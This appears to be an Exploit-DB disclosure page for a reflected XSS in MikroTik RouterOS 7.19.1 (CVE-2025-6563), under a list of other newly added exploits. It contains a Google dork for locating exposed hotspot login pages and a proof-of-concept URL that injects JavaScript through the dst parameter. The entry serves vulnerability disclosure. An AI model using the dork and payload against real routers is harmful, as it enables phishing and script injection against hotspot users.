08e51ef2f9
12 changes to exploits/shellcodes/ghdb TOTOLINK N300RB 8.54 - Command Execution MikroTik RouterOS 7.19.1 - Reflected XSS Langflow 1.2.x - Remote Code Execution (RCE) PivotX 3.0.0 RC3 - Remote Code Execution (RCE) SugarCRM 14.0.0 - SSRF/Code Injection White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) WP Publications WordPress Plugin 1.2 - Stored XSS NodeJS 24.x - Path Traversal Keras 2.15 - Remote Code Execution (RCE) Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges Microsoft Outlook - Remote Code Execution (RCE)
20 lines
No EOL
865 B
Text
20 lines
No EOL
865 B
Text
# Exploit Title: MikroTik RouterOS 7.19.1 - Reflected XSS
|
|
# Google Dork: inurl:/login?dst=
|
|
# Date: 2025-07-15
|
|
# Exploit Author: Prak Sokchea
|
|
# Vendor Homepage: https://mikrotik.com
|
|
# Software Link: https://mikrotik.com/download
|
|
# Version: RouterOS <= 7.19.1
|
|
# Tested on: MikroTik CHR 7.19.1
|
|
# CVE : CVE-2025-6563
|
|
|
|
# PoC:
|
|
# Visit the following URL while connected to the vulnerable MikroTik hotspot service:
|
|
# http://<target-ip>/login?dst=javascript:alert(3)
|
|
|
|
# A reflected XSS will be triggered when the dst parameter is not properly sanitized by the server-side logic.
|
|
# This vulnerability requires user interaction (visiting the link) and may be used in phishing or redirection attacks.
|
|
|
|
# Notes:
|
|
# This is a non-persistent reflected XSS. It is accepted due to the presence of a valid CVE (CVE-2025-6563),
|
|
# and has been acknowledged by MikroTik as a valid issue. |